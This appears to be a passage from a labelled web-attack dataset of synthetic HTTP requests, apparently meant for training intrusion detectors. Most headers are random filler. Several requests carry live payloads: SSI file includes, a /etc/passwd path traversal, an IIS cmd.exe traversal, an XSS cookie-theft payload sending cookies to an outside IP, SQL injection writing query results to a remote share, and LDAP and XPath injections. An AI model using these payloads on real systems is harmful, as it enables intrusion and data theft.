Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: Basic OTZkbjpqMXVycjlY
Range: 86309-
Referer: http://www.WjoE2e.uk/owopaehp/eolaRc/sEteshee.php
TE: trailers,trailers,deflate
Trailer: If-Match
User-Agent: e.Nz7Xb http://www.d2i5a.biz
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: HTTP/2.7 www.newa.css
Transfer-Encoding: identity
Upgrade: f6Ter/0.9
Warning: 437 66.2.246.8 "Ubflauttlali" "Tue, 23 Jun 09 09:36:33 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38451
Start - Id: 40482
class: SSI
GET /iH91omu7xmoentLDh/op4mtsed/xX1DzQ/2G86Dp/7QTwbZs/HHtkmailsk.aspx?KWVF7lZSconnectE=%3C%21--%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E&Sy=48ymlkiIclrrgh&asalAor9xm=4829 HTTP/1.0
Host: 216.40.190.235
Connection: nnathr
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.3, gzip;q=0.6, compress;q=0.7, deflate, compress
Accept-Language: ysoenZw-hnyas;q=0.8, reakew-hic, towk-1tL, n91c64en-oEmb5R;q=0.9
Cache-Control: no-transform
Client-ip: 178.48.213.72
Cookie: 299LlibI-E1=o oe;selretfdxeagonr=f8lsne-o;gti=tdeanu lr8n;ph4nayliec=tthrwtre0rtq
Cookie2: $Version="11"
Date: Mon, 08 Sep 08 21:14:00 CET
ETag: W/"FGqTlYRcSn07Vq9zDb"
Expect: 100-continue
From: Meara5ka@omiicnkiy.st
If-Modified-Since: Wed, 23 Sep 09 23:56:41 GMT
If-Unmodified-Since: Mon, 17 Sep 07 14:10:02 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 67
MIME-Version: 7.1
Pragma: dcdBx4i='ywtion'
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: Owte ttet=uRf4UoSt
Range: -2,3-4,8136-
Referer: /oqMstia.asp
TE: chunked,gzip
Trailer: Host
User-Agent: Mozilla/8.5 (Windows; U; Win 9x 8.8; Ue-ey; rv:5.1.2) Gecko/69717217
UA-CPU: PowerPC
UA-Disp: 609,4490,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0287x026
Via: ee8n/3.2 247.177.94.213, FTP/0.5 www.foMnu.tiff
Transfer-Encoding: deflate
Upgrade: Fgc8t/0.2
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 55598980904343059452
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40482
Start - Id: 46450
class: PathTransversal
POST /n0DTQBr-rfivVxwHT/tsjF.S4o/dKGFFx/hIShhstEu/oSMW1lzTk.IF6_/nopYbj0trgsz80ia/7BcYP/iRiMfSXSHZVj1g/oGP1.aspx? HTTP/1.1
Content-Length: 165
Content-Language: rii2i
Content-Encoding: compress
Content-Location: http://www.ty0fmuu1.org/h1brtre/wseedrcl.dll
Content-MD5: T3Rnb3lvcndhaHNpbGhvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Apr 06 01:28:42 GMT
Last-Modified: Mon, 30 Jun 08 20:19:19 CET
Host: 136.149.56.56:80
Connection: keep-alive
Accept: image/*;q=0.6
Accept-Charset: iso-8859-8-i;q=0.6, koi8, utf-8;q=0.7, x-mac-arabic;q=0.0
Accept-Encoding: gzip, gzip;q=0.6, gzip;q=0.5, deflate
Accept-Language: etnVhmI-inegs4wq, thkrYS-ijnscr
Cache-Control: max-age=104
Client-ip: 129.146.226.20
Cookie: srhpifdiatJid=1L6ODJf-I;os0ed=5616473;7ltolrrec=tI7;ssqscra=49;tbph2pwecvo=i%h9:;IpKYXinsertE_QbgsoundHt=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Cookie2: $Version="42"
Date: Thu, 17 Sep 09 02:33:19 UTC
ETag: W/"fZjz@U791LTHRkqn"
If-Modified-Since: Mon, 09 Oct 06 05:19:14 UTC
If-Unmodified-Since: Wed, 21 Feb 07 24:54:29 CET
If-Match: "7haw3@mf72lA1w6@55RI"
If-None-Match: *
If-Range: Thu, 29 Nov 07 12:19:09 CET
Max-Forwards: 574
MIME-Version: 2.0
Proxy-Authorization: Basic ZXR1bzphczVydg==
Authorization: Basic TmlvclJsMmE6aWV0RWV1cg==
Range: 006717-347661
Referer: /h87ue3/oOhd.pl
TE: trailers,trailers
User-Agent: Mozilla/4.0 (Windows; U; WinNT 1.1; u8-ts; rv:5.7.5) Gecko/49585812
UA-OS: Windows NT
Via: 5.3 www.gstf.htm, FTP/9.3 www.EaIHae.jpeg
Transfer-Encoding: identity
Upgrade: ena/1.1
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

u2o=r3076KR8aPI&n3smidnlct4cdr=ohegai&bete=o :&Cso1=vobTQYj&_hM6W=seeeO&dtnCt=miwHrrTxtea&cr3aio=R =passwdIn7s0a(n>bwAsS&g7l1ea=a]itelnet]s&hris=dt3j65ei

End - Id: 46450
Start - Id: 40427
class: SSI
PUT /Ehhrro7eualobenxE/Sp7RrhTxtetry64atn/nmteuFPtvlhqaninoetv/InubsAt/cag0ttoxmEd6/6yaimecrAeOOei.shtml? HTTP/1.1
Content-Length: 121
Content-Language: lpshb0e,2cn5iwnd
Content-Encoding: deflate
Content-Location: http://maylf.it/asiie.cgi
Content-MD5: ZWhudHRzcFRFT0ZldGNweA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Aug 05 16:37:33 UTC
Last-Modified: Fri, 07 Mar 08 15:45:09 CET
Host: 40.101.121.15
Connection: na3aea
Accept: audio/*, text/html, video/*
Accept-Charset: cp-932, koi8
Accept-Encoding: 
Accept-Language: 6-cw;q=0.5, sneitG-hhtlbr
Cache-Control: max-stale
Cookie: F-JmXLCxp_Soh=aylte;mEsltndtpdt=6704422783;vfntmheatsaildi=ovAAVwSZkp@;eto=zoeaot8do8li6mcinz;exsn2=ebidq5r_m
Date: Sun, 03 Aug 08 11:57:06 GMT
ETag: W/"Gtc66qHLMq56WpI2"
Expect: 100-continue
If-Modified-Since: Fri, 25 Apr 08 17:29:26 GMT
If-Unmodified-Since: Thu, 08 May 08 05:01:19 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 21 Nov 04 17:16:35 UTC
Max-Forwards: 4
Pragma: no-cache
Proxy-Authorization: Basic eHNzNmNjOnY3dGlodHU=
Authorization: NTLM dnR4ZmhsYThybmRFd3JmZGhyaDZnbG54ZDl0bHduZW9zYnRlNg==
Range: 35-1,0691-
Referer: http://www.nnP7.ch/tTdaw/8ssefd2o/deaia1/shoq/84yw.pl
User-Agent: Mozilla/0.2 (compatible; MSIE 3.7; Linux i386; ebrhta9er; onptus)
UA-Disp: 6530,0907,16
UA-Color: color16
Via: HTTP/6.6 142.47.250.210, 1.5 80.222.31.116, 1.8 189.211.54.57
Transfer-Encoding: atdgel; uoYnr=aNbne
Upgrade: 3h0su/4.6, Ihni1/2.0, jadi/1.1, snderm/3.9, r8h/6.6
X-Forwarded-For: 55.189.138.51
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oeaitritaiMie3=<!--    #include    virtual="d:\windows\autoexec.bat"   -->&iiaPateMkr=5ehscewedeiHro2

End - Id: 40427
Start - Id: 49321
class: XPathInjection
GET /fW/7ekZaEwgb/lCe8W/dU/trd12e8yehht6O2c/s@uL3vCqtGg.png?s5ttsee7ietO=neeep%27+or+%28i++++%3C+++count%28hi2a%2Fchild%3A%3Atext%28%29%29+++++and++++j++%3C++++count%28aii%2Fchild%3A%3Acomment%28%29%29++++and+++++k++%3C++count%28iGt%2Fchild%3A%3A*%29+%29+++++or++++%27dbz%27+++%3D++++%27+++++mssecS1%27++++or&asonoZo1=%2B%3Aewp-8e&Kt3agrP=19884432 HTTP/1.0
Host: www.ttEwUtH6.be:601
Connection: close
Accept: video/*;q=0.7
Accept-Charset: us-ascii;q=0.9, windows-1258
Accept-Encoding: deflate;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 66.86.201.155
Cookie: snmgdejssqmo=nRRSQ4;omreheJulvn=eisqxegrrhppoo4;oIaidaomy=ti? ao  eoaeelenipd
Cookie2: $Version="4"
Date: Mon, 22 Nov 04 03:00:50 UTC
ETag: "BoY2OwHYJAF2CRWj"
Expect: dIehaWe=esyeo;tx6ezea=Ee5h3s2
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Thu, 26 Jul 07 13:46:47 UTC
If-Unmodified-Since: Tue, 29 Nov 05 21:39:30 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Oct 08 07:28:24 UTC
Max-Forwards: 5809
MIME-Version: 6.3
Pragma: ele='htro'
Proxy-Authorization: Digest response="d0ae87B45D5a7ceD8A37AdE3bc88eEd6"
Authorization: 6rts7i fsehur=hewya
Range: 28823-,87212-
Referer: http://www.ekyiEe.fr/hrfcssgb/eefid2se/pa2v.html
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.4 (Machintosh; U; PPC Mac OS X 7.0; sy-dt; rv:9.9.4) Gecko/52113612
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 016x6303
Via: 3.0 154.46.153.249:7, 5.3 101.249.218.99, 9.2 www.dtSw.htm:8
Transfer-Encoding: deflate
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 462 247.12.174.34 "laiyomneitoohpnNd1mn" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 09521
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49321
Start - Id: 37939
class: LdapInjection
GET /k6CD2wd2O_DZ/eaC/oAuA6/ao/tOPq.LiGVtL7H4dE1B/0G4Rdftutc1/HBupdateIu/tqr3tattajn4q.pl?ceiLoeee=Retf%3FNtuonw+cftpunion&ptohiel=repem%29%28++++%7C+++%28ulrna%3D*%29 HTTP/1.1
Host: 81.221.225.100
Connection: keep-alive
Accept: image/*;q=0.6, application/zip, audio/basic;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: e-4avE;q=0.9, ihcmG6br-fgsps;q=0.5, wa3i-i, er-he
Cache-Control: no-cache
Client-ip: 242.187.199.146
Cookie: rOMJy0winntLb_lG=weRw;azYcf4cee7=552;natiloiWhyou=ina1useCv;lnommcp8ON4CtEt=fyek;L@ncO_T9=eas
Cookie2: $Version="132"
Date: Tue, 15 Jun 04 06:01:12 UTC
ETag: W/"JIaiNtCmlEs.7pkMV8yn"
Expect: lue5olis
From: iduony@u6ee.be
If-Modified-Since: Tue, 20 Apr 04 05:01:40 UTC
If-Unmodified-Since: Thu, 07 Feb 08 13:18:42 CET
If-Match: "EiunJW4dtzXReckC5Dy"
If-None-Match: "Enj7AJ4ZijbIE7J"
If-Range: *
Max-Forwards: 8
MIME-Version: 8.6
Pragma: fl9='iqCgkts'
Proxy-Authorization: Digest username="wEti"
Authorization: Basic TGFxZ2k6eWRoMA==
Range: 90559-
Referer: http://N39rngn.org/haio6/2yst4tT/o5sq/elnE/4Sxthhse.avi
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: oetezm/9.0
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 334x8610
Via: 0.6 www.0oie4.jpg:0987, 0.0 79.46.48.103, 0.2 www.a7ea7aa.shtml
Transfer-Encoding: identity
Upgrade: vtsi/8.4, niogL/5.5, sra/2.0
Warning: 090 www.Bnmbl7et.jpeg:1 "vijmhndae9nl7j6rggi" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37939
Start - Id: 49615
class: XPathInjection
GET /s8ID@EAVGJ-DCm4rK5su/iEL/0wjav23YmenteIeucnv/rolntereE1/rgsTeehlttf.gif?cglsv=ySt&yn7exabnnvnf=Eet%2F0ei28i%2F9hAl%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D7%5D+++or++%27sxo4%27+%3D++++%27&omo5rsihwJuO=063998677&ntilyeseobhs=786&2wsneociEe=eDZaIkG2&9eeoe=2&rreh2Oh=ccauobodyogg+nmeo HTTP/1.1
Host: 177.204.195.130
Connection: nmn9se
Accept: */*
Accept-Charset: isiri-3342, x-mac-arabic
Accept-Encoding: 
Accept-Language: lfn-m2qzeeei
Cache-Control: only-if-cached
Client-ip: 124.225.114.247
Cookie: yes=haincludedas;yttmiit=28133446;EnnfeS=dehAhym44si
Cookie2: $Version="392"
Date: Thu, 12 Oct 06 10:33:58 UTC
ETag: W/"baj@.7Mq2NB-WyuTN"
Expect: 100-continue
From: rrm2hTst@reeb.net
If-Modified-Since: Fri, 09 May 08 08:35:37 GMT
If-Unmodified-Since: Sat, 11 Aug 07 04:33:43 UTC
If-Match: "g4WpZKbe1bO39csVcth"
If-None-Match: "ayBoGl1E03vlXFx@"
If-Range: Tue, 05 Oct 04 05:56:11 UTC
Max-Forwards: 15
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: NTLM bGN0bmlwc25pbjdicmlkNW10ekFjZXRuYWxhdWVpZWVo
Authorization: NTLM U3Rlc21tb21PZWVzdWVhb2Rnc2FqcG5tb25vcmloTmk1ZUNib3JvcnJ3eDNt
Range: -2505
Referer: /6waeaCr/nrNanav/ntun/lhuo.png
TE: deflate;q=0.4
Trailer: Accept-Charset
User-Agent: Noseo (w9P2H.KM)
UA-CPU: Sparc
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 3.2 www.hn8Iz1.html, sdn5rt/7.0 184.180.55.30, 4.9 150.33.156.15:05158
Transfer-Encoding: identity
Upgrade: add/2.5
Warning: 885 www.nan6nedo.jpeg "UhOln0iubuetrq" 
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49615
Start - Id: 47453
class: XSS
GET /x59TdnhKOrt/ihahEc2gmmoriostaan.shtml?shlotei2eel=%3Cinput+type++++%3D+%22+image++%22++dynsrc%3D+++%22javascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F235.76.71.14%2Fas.aspx%27%2Bdocument.cookie%29%3B%5D+++%22++++%3E HTTP/1.0
Host: 242.192.155.217:30
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: utf-8;q=0.2, euc-tw
Accept-Encoding: *
Accept-Language: e-t5nee, emepdt-aa;q=0.8, orsfpa4-veanl63;q=0.5
Cache-Control: no-store
Client-ip: 184.47.37.121
Cookie: tva=uwindow.openhome1;rWuiutYt=65355443;weowtOrs= as;ugeeflvtll=brdnh;r4trn=83;Iynei4tixx=39
Cookie2: $Version="073"
Date: Thu, 26 Jan 06 12:21:13 UTC
ETag: W/"rp9_AP4VQ-1SnvWS"
Expect: emr8ts
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Wed, 19 Dec 07 13:59:23 UTC
If-Unmodified-Since: Mon, 29 Nov 04 18:59:54 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest algorithm=erorm7y
Range: 9547-817639
Referer: /tt45/eo5h6eu/dbtotri.asmx
TE: chunked
Trailer: From
User-Agent: u7Edepjeee/4.0.8
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 644x740
Via: HTTP/4.5 190.174.118.201, HTTP/6.5 193.41.121.221
Transfer-Encoding: mus4pe
Upgrade: If3b/5.7, ceh/7.0, ns8/1.8
Warning: 308 www.aenio10r.gif "lnesbftg" "Sun, 10 Aug 08 14:30:39 UTC"
X-Forwarded-For: 188.156.102.66
X-Serial-Number: 226091720709125
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47453
Start - Id: 37190
class: LdapInjection
GET /ohf733o/eu1uolanrr/lvaUUb-abG@kjp/tEZmxqLBzv_mwoc/dzHP4qCRG8zM_tA5g9/D1bRHMvupdate/Eytmmebxlg0eoetet7/aadjcm/sspakoetncafcscUnqoe/nrO/nCx22N-X/a41shyw3a.jpeg?Ct=30&M@dxyfqCb=ybin&mndclnthNt=ohbbetweeniE%7Edmeti&ZvbechoQ-2=stomle&eu1tislnro1n=dQqoA..aQ&93stAolfoaoGTr=1iot4o&a72sh5nhIhfe=7106&tsInprE7Niqm=91238&yc=efN6T&imsoeh=BlCte9m0ts+&varkU6openlOtfL=5oce5%29%28++%7C+++%28Nm%3D*%29&rsetnuhv=+d HTTP/1.1
Host: 38.193.236.142
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: ies-wCvoNJ5m
Cache-Control: no-transform
Client-ip: 176.206.229.193
Cookie: nsinet55O=h5vcNheG
Cookie2: $Version="524"
Date: Sun, 28 Feb 10 05:03:49 UTC
ETag: "gWkihjapRYwi3oCzZ"
Expect: mgos77f
If-Modified-Since: Wed, 10 Dec 08 16:22:40 CET
If-Unmodified-Since: Sun, 02 Nov 08 12:47:58 CET
If-Match: "8jgZKHOvloP6pjOWCEHY"
If-None-Match: *
If-Range: Wed, 14 Sep 05 03:31:26 UTC
Max-Forwards: 276
MIME-Version: 6.5
Pragma: no-cache
Authorization: iai0nd 4nyszpea=dnbr
Range: 3385-,6968-,40-033
Referer: /awnSert/tasp.tar.gz
TE: trailers,chunked,chunked
Trailer: From
User-Agent: saPi6trePenrohin
Via: FTP/9.4 74.101.161.137, 1.6 www.tttrt.html, FTP/6.0 32.6.182.83:9
Transfer-Encoding: gzip
Upgrade: fegweB/8.6
Warning: 049 www.snrd.js "elEedMobfonU" 
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37190
Start - Id: 41038
class: SqlInjection
GET /_hmlj8BchildiVhw/leeB1-8eayoQX9S0dY7/o2OrHOz34YvJE.jpeg?pXDUtmpcaccess_logZuj=%27%3B+EXEC+master..sp_makewebtask+++++%22%5C%5C119.212.254.18%5CUdtt3%5Coyoul.htm%22%2C++++%22SELECT+*+++FROM+++++INFORMATION_SCHEMA.TABLES%22&qqHL5h3=snetoelKs&o8hmoaeredhaw=065&lnRanctnyoo=ara1Aitvrtexpur&8qqnmSr=nZP2CNt HTTP/1.0
Host: 238.217.208.151:80
Connection: 5aixi
Accept: video/quicktime;q=0.8, video/mpeg;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: vritPer-aeIt;q=0.5, 1t4-l81t;q=0.1, acbnt-afiisRL;q=0.5, e6lm5wr-o1h;q=0.5, eAves-noM;q=0.9
Cache-Control: min-fresh=97292
Client-ip: 206.200.164.185
Cookie: iiEc=e-HKN34A;geyoNie=kJr8;EsuWwfg7iu=lekp;5tn=0274;ENidrm=123013
Cookie2: $Version="70"
Date: Wed, 23 Jan 08 08:33:02 UTC
ETag: W/"_WrR1Ly1ZlOqxyWv2v9n"
Expect: 100-continue
From: adtdMa@5hIximia3o.cz
If-Modified-Since: Sat, 30 Sep 06 11:57:55 UTC
If-Unmodified-Since: Mon, 02 Apr 07 05:20:35 CET
If-Match: *
If-None-Match: "RaOp5RQAmz3Z2FktPT1"
If-Range: Tue, 13 Dec 05 02:20:29 GMT
Max-Forwards: 28
MIME-Version: 1.6
Pragma: dharcigt=ht
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: tlsTrg fcoEr=nuhn
Range: 7-04,570-
Referer: http://www.5ffv.cz/rpT2taei/aphOsd/q6da/7r1r6it4.sh
TE: trailers,gzip,deflate
User-Agent: 6B300gJ http://www.aneo.com
UA-CPU: PowerPC
UA-Disp: 3796,7783,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 104x8770
Via: 3.2 107.11.11.233:8086
Transfer-Encoding: identity
Upgrade: mme/2.4, 09a/7.3, yAr/5.1, ihhdl/6.4
Warning: 886 225.6.48.99 "n1xne5msKpismeoarx" 
X-Forwarded-For: 51.33.153.49
X-Serial-Number: 27676908401
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41038
Start - Id: 39565
class: SSI
POST /GfselectV/ri7Dra/vdG/eLaVm8e8Z/4UGhome.png? HTTP/1.0
Content-Length: 128
Content-Language: tneall,ngtms
Content-Encoding: identity
Content-Location: /1hwr/emtx/uiereiea/2mi5u/mtwfor.html
Content-MD5: aHRocnkzZWQ1bnUwb29ncg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Jan 04 11:06:11 GMT
Last-Modified: Thu, 17 Aug 06 05:01:00 UTC
Host: www.iseCdree.de:80
Connection: keep-alive
Accept: video/*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: wt26ais-maoHy5;q=0.8, a-ha
Cache-Control: only-if-cached
Client-ip: 116.140.158.193
Cookie: me2=%;sgUnbso8oher=enrnpaoa9varnoY;7idhaskuesdntra=6aHlho4sooc
Cookie2: $Version="24"
Date: Fri, 24 Nov 06 01:42:02 UTC
ETag: W/"vZcMQZwfRNN7OOS96"
Expect: 100-continue
From: aweeee@nAyt.uk
If-Modified-Since: Wed, 29 Apr 09 18:32:44 CET
If-Unmodified-Since: Mon, 28 Jul 08 11:13:49 GMT
If-Match: ".pWFlEZtIRHo2b2NVp"
If-None-Match: *
If-Range: "@hNMJ9Go4AKH886z507"
Max-Forwards: 95
MIME-Version: 8.5
Pragma: Sa9='olh'
Proxy-Authorization: NTLM ZjJzNWlueDhhY29hdHBvZ2VvZWZwcmlyb2ljdDdidm55YXR5eTJpRWV4YWpTZXA=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: 55851-,73887-,-7
Referer: /bodiivl/hmemcotw/ntetlii/ezpo/Itta.jsp
TE: trailers,gzip;q=0.3,deflate;q=0.5
Trailer: Pragma
User-Agent: wnsvd/2.5.9
UA-Disp: 9131,8742,32
UA-OS: Win9x
UA-Color: color8
Via: ttbAa/3.4 www.feb5.gif:15029
Transfer-Encoding: thbmr; kea9n1=rtuahity
Upgrade: nqe/4.6, tcf/9.3, s1a3ie/5.1, pcoE/9.0, Ier1/7.4
Warning: 705 73.205.19.33:824 "uGhloLhinanOnahntN" 
X-Serial-Number: 11507528452920010282
----: -----------------
~~~~~: ~~~~~~~~~~

5rihe=6731&te6si1ey6nernm=<!--     #include   virtual="/var/log/httpd/access.log"  -->&oDuohftnXCteie=e9qF

End - Id: 39565
Start - Id: 37416
class: LdapInjection
GET /.execorWO5M@lv/riihajm/0VRWge1BQKfn8EA@z/d8s_gupdateSoWD1fs/npWmGp/ZL/e1ie3bs.png?eiEOl6mx1dA3dme=2dYLjtX7&enaco=vbscriptie+s&xaxpassthrutoO8=execenf&lnrrvsohoHao=tQ2s12MKEl9a&ZF6sn2BKrAk=amwenclR5tw&p5oio8osa=cuTSu&Ren=wp-x1a+t+ladremIs&tBheU=23&Ab7aRiqclltn=7&CrmpFUD7positionbTB=jarlink&tk0wHteiireaz=49&eanet7edmdru=kd%404L&hsingTjeters9=%3Ar%3Bci&eKw=rhT7FJJ6j&ngle4ihe=9 HTTP/1.0
Host: www.endaD.com:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 188.193.125.170
Cookie: 8moaeeun4nEoyin=) (    |    (a07=serpc*);zpr8p4o0=tah= ;ookedE2Ires=ieAe93;c9ar=s60;nanyit=ef;
Cookie2: $Version="22"
Date: Sun, 01 May 05 08:11:38 GMT
ETag: "hykp_z-@oEb2W0RoC9fz"
Expect: 100-continue
From: alaHcor@ktljooA.cz
If-Modified-Since: Wed, 18 Mar 09 15:36:25 UTC
If-Unmodified-Since: Mon, 13 Jul 09 03:07:54 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 1.4
Pragma: tpstoc='n'
Proxy-Authorization: Digest cnonce="EOlts"
Authorization: NTLM ZGFoZDVjamhhNnRlaWVtaEVhZGVybGFzYldlaG5sczZnVDZlaW50YTho
Range: 747728-0693
Referer: http://www.rrtpam.org/ntedO1/c7oc5d.php3
TE: gzip,trailers,trailers
Trailer: TE
User-Agent: uSh8iEvi/7.6
UA-CPU: Sparc
UA-Disp: 8897,3460,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 359x5733
Via: 3.8 www.e0i2cn5e.html
Transfer-Encoding: deflate
Upgrade: inCnt/4.0, wfn/1.0
Warning: 765 162.186.194.255:60063 "9jas9wzbnauexd" "Sun, 12 Oct 08 22:18:16 GMT"
X-Forwarded-For: 63.251.171.158
X-Serial-Number: 212738201929223
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37416
Start - Id: 44331
class: OsCommanding
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.enpttgdp9h.biz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-age=222
Client-ip: 70.255.193.81
Cookie: Hoslenvn= w@ n
Cookie2: $Version="92"
Date: Mon, 20 Dec 04 07:25:15 CET
ETag: "JwOlqko42x3NtlOT"
Expect: 100-continue
From: ssaaei@srTei5is.de
If-Modified-Since: Fri, 28 May 04 09:10:38 GMT
If-Unmodified-Since: Fri, 23 Nov 07 20:23:01 GMT
If-Match: *
If-None-Match: "m5x0ieOgIeNsH5IG@YyR"
If-Range: "KifzXthQy8DwbK-h6d"
Max-Forwards: 1297
MIME-Version: 1.6
Pragma: htx5P='d'
Proxy-Authorization: Basic T2hsMGg6YWFhMg==
Authorization: Digest qop=o9hhYhvt
Range: 88-15414
Referer: http://www.n5ypdv.st/laPgmrm/qshsr.wav
TE: deflate;q=0.5
Trailer: If-None-Match
User-Agent: rzZVRpH http://www.naept.be
UA-CPU: PowerPC
UA-Disp: 8897,9221,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 127x111
Via: ao4d8z/0.3 www.Fpodoa6.htm, 0.7 102.52.140.200, byeheb/8.3 39.125.50.193:9139
Transfer-Encoding: gasteO
Upgrade: srlma/8.2, So6/5.2, moPz/7.3, aeng/1.5, aoyO0a/8.2
Warning: 450 137.33.40.57 "ymhep" "Sat, 27 May 06 20:03:51 UTC"
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44331
Start - Id: 42208
class: SqlInjection
GET /ljHiM6Xd-J/grfacthhryaLNgs/YbagQtT/s5xtqZkJoYy8vphV__.nsf?shoibhsc2iaaac=yrtmpqinclude%28cferlshaeaAto5&ymetT=%27select+customer_phone+++++%27%7C%7C%27from+customers++%27%7C%7C%27where+++++customer_surname%3D%27%27%27%7C%7C+++++lv_surname%7C%7C%27%27%27+and+++++customer_type%3D1%27%3B&KcmeMia9tn9=cneuzimgu%40sitpositiono&dfzr4asCbeau=nIbo&dfi=mtasrELotob&W7F4=9&oubpibe=h0Wuo&StpOe=8&b-WAor4=d5sas&pdehsin4=usneai HTTP/1.1
Host: 189.26.107.221:80
Connection: taen
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.2, windows-1257;q=0.5, x-mac-japanese, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 110.245.212.227
Cookie: aBnt=c7G;reeougA=283;5l@QgB2dKh=2;ZCA0=$rD;s3kijEtlincdsl9=3772190773
Cookie2: $Version="7"
Date: Sat, 11 Dec 04 05:40:51 GMT
ETag: "08QcJQ-@nCVHGD-jk@-M"
Expect: ori1n=c62orr
From: bp6teizi@aeuaCwa.uk
If-Modified-Since: Thu, 21 Jul 05 02:24:56 GMT
If-Unmodified-Since: Tue, 20 Sep 05 18:30:43 UTC
If-Match: "-AYkDfPTiqoR_X@7o"
If-None-Match: *
If-Range: "_h1KHJSxLwaeJm-ZMRm"
Max-Forwards: 721
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM ZE5lVG9hbGlzZWw1ZGh4b3RxYXlvZHRyMHRxZWl3bGNObmg=
Authorization: tohms oro1h=3Duzsaa
Range: 8473-303,-227666,770360-
Referer: http://lfird.ch/fse7safe.js
TE: trailers,trailers
Trailer: Warning
User-Agent: 7irn (eY2yp9j; hrqYDi; 1jivV009Hl)
UA-CPU: StrongARM
UA-Disp: 764,0830,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 451x3766
Via: 4.6 151.62.141.211, 5.2 234.231.155.225:769, 4.2 www.v3tn.gif:889
Transfer-Encoding: gzip
Upgrade: srir/8.4
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
